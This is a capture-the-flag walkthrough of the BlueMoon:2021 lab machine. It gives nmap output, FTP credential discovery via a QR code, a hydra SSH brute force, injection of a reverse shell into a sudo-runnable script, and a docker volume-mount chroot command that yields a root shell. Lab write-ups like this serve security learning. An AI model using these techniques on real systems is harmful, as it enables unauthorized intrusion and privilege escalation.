We always start with an nmap scan…..
Nmap -sC -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Sat Apr 17 15:59:01 2021 as: nmap -sC -p- -sV -oA nmap 172.16.139.148 Nmap scan report for 172.16.139.148 Host is up (0.0073s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 2c:e2:63:78:bc:55:fe:f3:cb:09:a9:d8:26:2f:cb:d5 (RSA) | 256 c4:c8:6b:48:92:25:a5:f7:00:9f:ab:b2:56:d5:ed:dc (ECDSA) |_ 256 a9:5b:39:a1:6e:05:91:0f:75:3c:88:0b:55:7c:a8:c2 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: BlueMoon:2021 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 17 15:59:15 2021 -- 1 IP address (1 host up) scanned in 13.26 seconds
FTP no anonymous logins is allow so let burst some directory probably the way in.
/hidden_text look interesting let check it out hmmm maintanance page clicking on the
Thank you download a Qr code.
Cool let use some online tools to read it.
Awesome credentials for FTP let hit and use it to log into FTP.
We are in so let download all the files in the FTP.
Hello robin ...! I'm Already Told You About Your Password Weekness. I will give a Password list. you May Choose Anyone of The Password.
So i hit hydra with the username
robin and the password list i found in the FTP server.
Cool let ssh into the machine with the credentials we just got from brute forcing ssh.
And we are in let chek
sudo first i always check
Cool we can run sudo to get user jerry a little issue the
was own by me but can't wrrite to it so i give it chmod 777 permission so i echo a reverse shell payload in the file and start a ncat listerner.
sudo -u jerry /home/robin/project/feedback.sh
And boom we have jerry shell time to escalate to root.
It can be used to break out from restricted environments by spawning an interactive system shell the resulting is a root shell.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
And we are root Box rooted,
Greeting From Muzec